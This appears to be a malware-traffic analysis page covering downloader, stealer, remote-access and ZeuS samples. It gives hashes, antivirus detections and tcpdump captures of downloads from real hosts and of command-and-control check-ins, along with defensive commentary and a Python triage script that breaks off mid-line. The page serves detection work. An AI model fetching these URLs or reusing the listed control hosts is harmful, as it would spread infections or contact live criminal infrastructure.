Snojan Dynamer Trojan Downloader Malware fifexont.com tonekrant.com FULL PCAP File Download Traffic Analysis

SHA256: a66c3e211004c7d403f633a0ced7327f5b2b102f47be4226d24edcb7ebd21562
File name: front.exe
Detection ratio: 49 / 58
Analysis date: 2017-02-20 05:26:08 UTC
Antivirus Result Update
ALYac Trojan.GenericKD.4294253 20170220
AVG Agent5.AXHG 20170220
AVware Trojan.Win32.Generic!BT 20170220
Ad-Aware Trojan.GenericKD.4294253 20170220
AegisLab Uds.Dangerousobject.Multi!c 20170220
AhnLab-V3 Trojan/Win32.Snojan.C1770480 20170219
Arcabit Trojan.Generic.D41866D 20170220
Avast Win32:Malware-gen 20170220
Avira (no cloud) TR/Crypt.ZPACK.wcpog 20170219
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9999 20170217
BitDefender Trojan.GenericKD.4294253 20170220
Bkav HW32.Packed.3570 20170218
CAT-QuickHeal Trojan.Dynamer 20170218
ClamAV Win.Trojan.Generic-5747581-0 20170220
Comodo UnclassifiedMalware 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (W) 20170130

2017-02-18 07:29:58.854612 IP 192.168.1.102.55863 > 46.30.213.95.80: Flags [P.], seq 0:285, ack 1, win 64240, length 285: HTTP: GET /front.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: galflview.com
Connection: Keep-Alive

Only the client's side of each conversation is shown (the raw packet bytes that tcpdump -A printed under each summary line carried nothing readable and are left out). 75.75.75.75 and 75.75.76.76 are the lab network's Comcast resolvers, and the *.hsd1.md.comcast.net queries are the same names with that network's DNS search suffix appended, which the Windows resolver does once the bare name fails. The lookups for tonekrant.com and fifexont.com are re-sent with a single transaction ID each (27009 and 46732) to both resolvers, so they were being retried; the sample nonetheless connects to 93.179.121.47 for tonekrant.com and to 93.179.121.170 for fifexont.com, two hosts in the same /24. v10.vortex-win.data.microsoft.com and tele.trafficmanager.net (the GET with User-Agent "client connection" at the end) are Windows telemetry, and the 61-byte UDP packets to 157.56.31.43:3544 every 25 s or so are Teredo router solicitations from the host itself (13-byte Teredo authentication header + 40-byte IPv6 header + 8-byte ICMPv6 RS = 61 bytes); they recur in every capture on this page and are not indicators of this sample.

2017-02-18 07:30:39.853148 IP 192.168.1.102.58750 > 75.75.75.75.53: 64438+ A? mutinenag.com. (31)
2017-02-18 07:30:39.895762 IP 192.168.1.102.49577 > 75.75.75.75.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
2017-02-18 07:30:39.926948 IP 192.168.1.102.49577 > 75.75.76.76.53: 38977+ A? mutinenag.com.hsd1.md.comcast.net. (51)
2017-02-18 07:30:44.725455 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
2017-02-18 07:31:01.825945 IP 192.168.1.102.58993 > 75.75.76.76.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
2017-02-18 07:31:12.547120 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:24.641948 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:25.627370 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:26.641969 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.627190 IP 192.168.1.102.58996 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.627605 IP 192.168.1.102.58997 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:27.630024 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)

Both check-ins below are a POST /js.php whose headers declare Content-Length: 4, yet the segment (428 bytes to tonekrant.com, 427 to fifexont.com, the one-byte difference being the Host value) carries 271 bytes after the header block: the printable prefix PKEY followed by non-printable bytes, which tcpdump renders as dots. The server closes each connection after one short reply (the client ACKs 2, i.e. one byte, then sends FIN).

2017-02-18 07:31:28.032961 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [S], seq 3536318263, win 8192, options
2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
Host: tonekrant.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY [followed by 267 non-printable bytes, printed by tcpdump as dots]
2017-02-18 07:31:28.353750 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [.], ack 2, win 256, length 0
2017-02-18 07:31:28.354903 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [F.], seq 428, ack 2, win 256, length 0
2017-02-18 07:31:28.642457 IP 192.168.1.102.58995 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:29.627324 IP 192.168.1.102.58996 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:29.630282 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:30.642485 IP 192.168.1.102.58995 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:37.200322 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:31:43.367646 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:44.361927 IP 192.168.1.102.58999 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:45.361997 IP 192.168.1.102.59000 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:45.363970 IP 192.168.1.102.58998 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:46.361710 IP 192.168.1.102.58999 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)

2017-02-18 07:31:46.827372 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [P.], seq 0:427, ack 1, win 256, length 427: HTTP: POST /js.php HTTP/1.1
Host: fifexont.com
Accept: text/html, */*
Content-Type: application/x-www-form-urlencoded
Content-Length: 4
Connection: close

PKEY [followed by 267 non-printable bytes, printed by tcpdump as dots]
2017-02-18 07:31:46.976014 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [.], ack 2, win 256, length 0
2017-02-18 07:31:46.976419 IP 192.168.1.102.56024 > 93.179.121.170.80: Flags [F.], seq 427, ack 2, win 256, length 0
2017-02-18 07:31:47.361693 IP 192.168.1.102.59000 > 75.75.76.76.53: 46732+ A? fifexont.com. (30)
2017-02-18 07:31:47.364159 IP 192.168.1.102.58998 > 75.75.75.75.53: 46732+ A? fifexont.com. (30)

Windows telemetry, not the sample (kept here to show what a clean baseline of this host looks like):

2017-02-18 07:35:43.355047 IP 192.168.1.102.49579 > 75.75.75.75.53: 44680+ A? tele.trafficmanager.net. (41)
2017-02-18 07:35:43.373699 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [S], seq 3222178950, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:35:43.402299 IP 192.168.1.102.56038 > 65.55.252.190.443: Flags [.], ack 4237, win 253, length 0
2017-02-18 07:35:43.457448 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [.], ack 3335379774, win 258, length 0
2017-02-18 07:35:43.457557 IP 192.168.1.102.56039 > 191.239.50.77.80: Flags [P.], seq 0:189, ack 1, win 258, length 189: HTTP: GET /%7B5F1B98CE-D333-41DA-B5CE-72EFDD71B6DF%7D HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: client connection
Host: tele.trafficmanager.net
Trojan Crypt Password Stealer Malware turbo.exe 157.56.31.43 Port 3544/UDP PCAP file download Traffic Sample

SHA256: b31c4f30f37be6a0ea904019fcce94319fd59215fe06d52a265946be088d2592
File name: turbo.exe
Detection ratio: 48 / 58
Analysis date: 2017-02-20 04:48:47 UTC
Cyren W32/Trojan.YHFN-2823 20170220
DrWeb Trojan.PWS.Stealer.15842 20170220
ESET-NOD32 a variant of Win32/Injector.DKFX 20170219
Emsisoft Trojan.GenericKD.4236515 (B) 20170220
F-Secure Trojan.GenericKD.4236515 20170220
Fortinet W32/Injector.DJWH!tr 20170220
GData Trojan.GenericKD.4236515 20170220
Ikarus Trojan.Win32.Injector 20170219
K7AntiVirus Trojan ( 005036d71 ) 20170220
K7GW Trojan ( 005036d71 ) 20170220
Kaspersky Trojan.Win32.Agent.neytzz 20170220
Malwarebytes Trojan.Crypt 20170220
McAfee Trojan-FLBV!22730AE47ACC 20170220
McAfee-GW-Edition Trojan-FLBV!22730AE47ACC

2017-02-18 07:20:52.112791 IP 192.168.1.102.55812 > 182.255.5.201.80: Flags [P.], seq 0:416, ack 1, win 256, length 416: HTTP: GET /~bemkmund/two/turbo.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Range: bytes=243275-
Unless-Modified-Since: Mon, 23 Jan 2017 15:24:32 GMT
If-Range: "983c9c-1b5000-546c498a46c00"
Host: 182.255.5.201
Connection: Keep-Alive

This is a resumed download, not a first fetch: Range asks for everything from byte 243275 on, and If-Range carries the server's ETag so the range is honoured only if the file is unchanged. Unless-Modified-Since is a non-standard header characteristic of the Windows WinINet stack, which fits the MSIE 8 User-Agent. The ETag has Apache's default inode-size-mtime layout; read that way the file is 0x1b5000 = 1,789,952 bytes and its mtime is 23 Jan 2017 15:24:32 GMT, the same instant as the Unless-Modified-Since value, so the client already held 243,275 of 1,789,952 bytes. The sample is fetched by bare IP (Host: 182.255.5.201) from a user home directory (/~bemkmund/).

The three UDP packets to 157.56.31.43:3544 that follow are Teredo router solicitations sent by the Windows host itself (61 bytes: 13-byte Teredo authentication header + 40-byte IPv6 header + 8-byte ICMPv6 RS), about every 25 s; they appear in every capture on this page, whichever sample was running, and are not traffic of turbo.exe.

2017-02-18 07:21:19.360454 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:21:43.787645 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:22:07.487712 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
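The Range / If-Range / Unless-Modified-Since trio above can be checked mechanically. The following is an added example, not code from the original post: it parses the request headers, decodes the If-Range value on the assumption that the server is Apache httpd using its default ETag layout (inode, size, mtime in microseconds, all hex), and confirms that reading by comparing the decoded mtime with the Unless-Modified-Since date. The REQUEST text is copied from the turbo.exe request on this page.

```python
import re
from datetime import datetime, timezone
from email.utils import parsedate_to_datetime

# Constructed sample: the resumed GET for turbo.exe shown above (headers only).
REQUEST = """\
GET /~bemkmund/two/turbo.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Range: bytes=243275-
Unless-Modified-Since: Mon, 23 Jan 2017 15:24:32 GMT
If-Range: "983c9c-1b5000-546c498a46c00"
Host: 182.255.5.201
Connection: Keep-Alive
"""


def parse_request(raw):
    """Request line plus a dict of lower-cased header names to values."""
    lines = raw.strip().splitlines()
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def decode_apache_etag(etag):
    """Assumption: Apache httpd default FileETag (INode MTime Size) = "inode-size-mtime",
    each field hex, mtime as microseconds since the epoch. Returns None for other layouts."""
    m = re.fullmatch(r'(?:W/)?"([0-9a-f]+)-([0-9a-f]+)-([0-9a-f]+)"', etag)
    if not m:
        return None
    inode, size, mtime_us = (int(x, 16) for x in m.groups())
    return {"inode": inode, "size": size,
            "mtime": datetime.fromtimestamp(mtime_us / 1_000_000, tz=timezone.utc)}


def resume_info(raw):
    """What a resumed (open-ended Range) download tells us about the file being fetched."""
    request_line, h = parse_request(raw)
    m = re.fullmatch(r"bytes=(\d+)-", h.get("range", ""))
    if not m:
        return None  # not a resume: no open-ended Range header
    offset = int(m.group(1))
    tag = decode_apache_etag(h.get("if-range", ""))
    info = {"request": request_line, "offset": offset, "etag": tag}
    if tag:
        info["remaining"] = tag["size"] - offset
        ums = h.get("unless-modified-since")
        if ums:
            # If the decoded mtime equals the client's date, the inode-size-mtime reading is confirmed.
            info["mtime_consistent"] = parsedate_to_datetime(ums) == tag["mtime"]
    return info


if __name__ == "__main__":
    print(resume_info(REQUEST))
```

With these headers the decoded mtime lands exactly on the Unless-Modified-Since date, which is the check that justifies trusting the size field (1,789,952 bytes) when sizing the dropped file.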

Xrat-R Remote Access Trojan h1h1tl3r.click Off1c3v4l1dK3y2017s.exe Malware Backdoor PCAP file Download Traffic Analysis

Troj/Xrat-R exhibits the following characteristics:

File Information

Size
1.1M
SHA-1
5c533a9f95f69c98f5926810f0cf78fa7a6cf447
MD5
c6e081d416d2bde4d450f7dc34c1351c
CRC-32
f70ab7ef
File type
Windows executable
First seen
2016-12-11

Runtime Analysis

Registry Keys Created
  • HKCU\Software\zUB8dknwC
    InstalledServer
    c:\Documents and Settings\test user\Application Data\f6hjg\28dpo.exe
  • HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    GWlgQh
    C:\GWlgQhGWlgQh\GWlgQh.vbs
Processes Created
  • c:\Documents and Settings\test user\application data\f6hjg\28dpo.exe
  • c:\windows\microsoft.net\framework\v2.0.50727\csc.exe

2017-02-18 07:24:47.085846 IP 192.168.1.102.55839 > 108.179.232.87.80: Flags [P.], seq 0:317, ack 1, win 256, length 317: HTTP: GET /Off1c3v4l1dK3y2017s.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: dryversdocumentsandcustomer.com
Connection: Keep-Alive

The Sophos runtime analysis above shows the sample launching csc.exe, the .NET C# compiler, so it compiles code at run time, and persisting through HKCU\Software\zUB8dknwC\InstalledServer and a RunOnce entry pointing at a .vbs. On the wire, the host looks up sslwin.moneyhome.biz and 0.1 s later opens TCP/900 to 189.149.72.13, then looks up h1h1tl3r.click and opens TCP/900 to 199.233.237.21; by timing those are the addresses the names resolved to. Every SYN is retransmitted at +3 s and +6 s, the last one without the window-scale option, so neither control host answered during the capture. d.dropbox.com and c0pywins.is-not-certified.com are also looked up. The UDP/3544 packets are Teredo, as noted in the sections above.

2017-02-18 07:26:16.924122 IP 192.168.1.102.62494 > 75.75.75.75.53: 42747+ A? sslwin.moneyhome.biz. (38)
2017-02-18 07:26:17.036254 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:26:20.036795 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:26:26.037104 IP 192.168.1.102.55848 > 189.149.72.13.900: Flags [S], seq 1769736925, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:26:34.553249 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:26:43.302596 IP 192.168.1.102.60917 > 75.75.75.75.53: 53811+ A? d.dropbox.com. (31)
2017-02-18 07:26:48.033633 IP 192.168.1.102.60918 > 75.75.75.75.53: 26266+ A? c0pywins.is-not-certified.com. (47)

2017-02-18 07:27:19.096213 IP 192.168.1.102.61329 > 75.75.75.75.53: 53682+ A? h1h1tl3r.click. (32)
2017-02-18 07:27:19.231571 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:27:20.699792 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:27:22.231434 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:27:28.231236 IP 192.168.1.102.55854 > 199.233.237.21.900: Flags [S], seq 2862954159, win 8192, options [mss 1460,nop,nop,sackOK], length 0

ZBOT ZeuS Banking Trojan Malware melonia.exe PCAP file download Traffic Sample 91.195.103.14

SHA256: 149fda05458720c56fe36871c2d8991a4f67ad87fb512873c6e7b481fca078c0
File name: melonia.exe
Detection ratio: 13 / 58
Analysis date: 2017-02-20 04:22:36 UTC
Antivirus Result Update
Baidu Win32.Trojan.WisdomEyes.16070401.9500.9990 20170217
BitDefender Gen:Variant.Midie.35271 20170220
CrowdStrike Falcon (ML) malicious_confidence_100% (D) 20170130
Endgame malicious (high confidence) 20170217
Invincea trojandropper.win32.small.pq 20170203
K7GW Hacktool ( 655367771 ) 20170220
Kaspersky UDS:DangerousObject.Multi.Generic 20170220
Malwarebytes Trojan.Xcsidl 20170220
McAfee Artemis!395315BF3E1F 20170220
McAfee-GW-Edition Artemis 20170219
Qihoo-360 HEUR/QVM07.1.0000.Malware.Gen 20170220
Symantec ML.Attribute.HighConfidence 20170219
Webroot Malicious 20170220

 

Troj/Zbot-LMH exhibits the following characteristics:

File Information

Size
124K
SHA-1
8d7bc351ed622a28d1c4db09da6ea8c156099581
MD5
a6c8dfd98f730c2d9aa33e521acf4514
CRC-32
8a762a91
File type
Windows executable
First seen
2016-07-12

 

2017-02-18 07:18:10.284472 IP 192.168.1.102.55783 > 91.195.103.14.80: Flags [P.], seq 0:287, ack 1, win 256, length 287: HTTP: GET /melonia.exe HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: 91.195.103.14
Connection: Keep-Alive

About 22 s after the download the sample opens five TCP/80 connections within 3 ms to hosts on unrelated networks (85.17.31.111, 78.88.177.119, 197.45.139.121, 212.45.72.145, 73.135.114.157), five more at 07:18:39 and two more at 07:19:00. Four of the first five answer (the client ACKs their SYN-ACKs); SYNs that get no answer are retransmitted at +3 s and +9 s, the last without the window-scale option. The first connection to 73.135.114.157 is closed right after the handshake and reopened on port 55789, over which the client sends the same 164-byte payload twice and then a 1460-byte segment. tcpdump labels these segments "HTTP" only because of the destination port; the bytes are not HTTP. This list-driven fan-out, rather than any single beacon, is the behaviour to key on. The 157.56.31.43:3544 packet is Teredo, as noted above.

2017-02-18 07:18:26.395354 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:18:32.281760 IP 192.168.1.102.55784 > 85.17.31.111.80: Flags [S], seq 1022274422, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.282703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.282905 IP 192.168.1.102.55786 > 197.45.139.121.80: Flags [S], seq 1410864012, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.283680 IP 192.168.1.102.55787 > 212.45.72.145.80: Flags [S], seq 3977795037, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.283856 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [S], seq 3145529474, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.355074 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [.], ack 3468195037, win 256, length 0
2017-02-18 07:18:32.372025 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [F.], seq 0, ack 1, win 256, length 0
2017-02-18 07:18:32.389522 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:32.412338 IP 192.168.1.102.55784 > 85.17.31.111.80: Flags [.], ack 3488374086, win 256, length 0
2017-02-18 07:18:32.463521 IP 192.168.1.102.55787 > 212.45.72.145.80: Flags [.], ack 757101935, win 256, length 0
2017-02-18 07:18:32.483076 IP 192.168.1.102.55786 > 197.45.139.121.80: Flags [.], ack 306858242, win 64952, length 0
2017-02-18 07:18:32.916124 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:33.150537 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [.], ack 2, win 256, length 0
2017-02-18 07:18:33.446215 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [S], seq 25112193, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:33.485592 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [.], ack 3792818486, win 64240, length 0
2017-02-18 07:18:33.503674 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 0:164, ack 1, win 64240, length 164: HTTP
2017-02-18 07:18:33.703225 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 0:164, ack 1, win 64240, length 164: HTTP
2017-02-18 07:18:35.237008 IP 192.168.1.102.55789 > 73.135.114.157.80: Flags [P.], seq 164:1624, ack 238, win 64003, length 1460: HTTP

2017-02-18 07:18:39.928486 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:39.928906 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:39.929119 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:39.929297 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:39.929473 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:41.283703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 65535, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:42.928918 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:42.928929 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:42.929374 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:42.929897 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:42.930440 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:18:48.929730 IP 192.168.1.102.55790 > 91.231.57.148.80: Flags [S], seq 2015127680, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:48.929740 IP 192.168.1.102.55792 > 122.197.210.203.80: Flags [S], seq 517380099, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:48.929743 IP 192.168.1.102.55794 > 109.162.84.248.80: Flags [S], seq 2308039312, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:48.930683 IP 192.168.1.102.55791 > 115.241.92.185.80: Flags [S], seq 3717034982, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:48.931157 IP 192.168.1.102.55793 > 77.253.60.225.80: Flags [S], seq 119795964, win 8192, options [mss 1460,nop,nop,sackOK], length 0
2017-02-18 07:18:49.863870 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:19:00.857340 IP 192.168.1.102.55795 > 46.149.62.141.80: Flags [S], seq 2819666092, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2017-02-18 07:19:00.857494 IP 192.168.1.102.55796 > 86.104.197.176.80: Flags [S], seq 862654258, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
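The triage that the first section (the retried lookups and the js.php POSTs) and this one (the SYN fan-out) both call for, written out as an added example; this is not code from the original post. It parses tcpdump summary lines, removes the lab host's own background traffic (Teredo on UDP/3544, Windows telemetry names, search-suffix variants of a name), lists the names the sample kept re-asking for, flags SYN retransmissions and bursts of SYNs to many distinct hosts, and compares the declared Content-Length of the js.php POST with the bytes its segment actually carried. The SAMPLE lines are copied (abridged) from this page; the search suffix hsd1.md.comcast.net and the background-traffic patterns are assumptions taken from this capture alone.

```python
import re
from collections import Counter, defaultdict
from datetime import datetime

# Constructed sample: tcpdump summary lines copied (abridged) from the captures on this page.
SAMPLE = """\
2017-02-18 07:18:32.281760 IP 192.168.1.102.55784 > 85.17.31.111.80: Flags [S], seq 1022274422, win 8192, length 0
2017-02-18 07:18:32.282703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 8192, length 0
2017-02-18 07:18:32.283680 IP 192.168.1.102.55787 > 212.45.72.145.80: Flags [S], seq 3977795037, win 8192, length 0
2017-02-18 07:18:32.283856 IP 192.168.1.102.55788 > 73.135.114.157.80: Flags [S], seq 3145529474, win 8192, length 0
2017-02-18 07:18:41.283703 IP 192.168.1.102.55785 > 78.88.177.119.80: Flags [S], seq 1239151302, win 65535, length 0
2017-02-18 07:18:49.863870 IP 192.168.1.102.63306 > 157.56.31.43.3544: UDP, length 61
2017-02-18 07:30:58.514427 IP 192.168.1.102.50385 > 75.75.75.75.53: 22454+ A? v10.vortex-win.data.microsoft.com. (51)
2017-02-18 07:31:01.723097 IP 192.168.1.102.50386 > 75.75.75.75.53: 16459+ A? mumeraxo.com. (30)
2017-02-18 07:31:01.794496 IP 192.168.1.102.58993 > 75.75.75.75.53: 13753+ A? mumeraxo.com.hsd1.md.comcast.net. (50)
2017-02-18 07:31:23.630061 IP 192.168.1.102.58994 > 75.75.75.75.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:25.629833 IP 192.168.1.102.58994 > 75.75.76.76.53: 27009+ A? tonekrant.com. (31)
2017-02-18 07:31:28.202872 IP 192.168.1.102.55867 > 93.179.121.47.80: Flags [P.], seq 0:428, ack 1, win 256, length 428: HTTP: POST /js.php HTTP/1.1
"""
# Header block of that POST, copied from the page (no body), for the Content-Length check.
POST_HEADERS = ["POST /js.php HTTP/1.1", "Host: tonekrant.com", "Accept: text/html, */*",
                "Content-Type: application/x-www-form-urlencoded", "Content-Length: 4", "Connection: close"]

SEARCH_SUFFIX = "hsd1.md.comcast.net"  # assumption: the lab network's DNS search suffix
TELEMETRY = (".data.microsoft.com", "tele.trafficmanager.net")  # Windows background names

LINE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d\.\d+) IP "
                  r"(?P<src>[\d.]+)\.(?P<sport>\d+) > (?P<dst>[\d.]+)\.(?P<dport>\d+): (?P<rest>.*)$")
DNS_Q = re.compile(r"^(?P<txid>\d+)\+ A\? (?P<name>.+?)\. \(\d+\)$")
TCP = re.compile(r"^Flags \[(?P<flags>[^\]]+)\], seq (?P<seq>\d+)")
HTTP_REQ = re.compile(r"HTTP: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]$")
UDP = re.compile(r"^UDP, length (?P<length>\d+)$")

def parse(text):
    """Turn tcpdump summary lines into dicts; anything that is not a summary line is skipped."""
    recs = []
    for line in text.splitlines():
        if not (m := LINE.match(line)):
            continue
        r = dict(m.groupdict(), kind="other")
        r["ts"] = datetime.strptime(r["ts"], "%Y-%m-%d %H:%M:%S.%f")
        r["sport"], r["dport"] = int(r["sport"]), int(r["dport"])
        if (d := DNS_Q.match(r["rest"])):
            r.update(kind="dns", txid=int(d["txid"]), name=d["name"])
        elif (t := TCP.match(r["rest"])):
            r.update(kind="tcp", flags=t["flags"], seq=int(t["seq"]))
            if (h := HTTP_REQ.search(r["rest"])):
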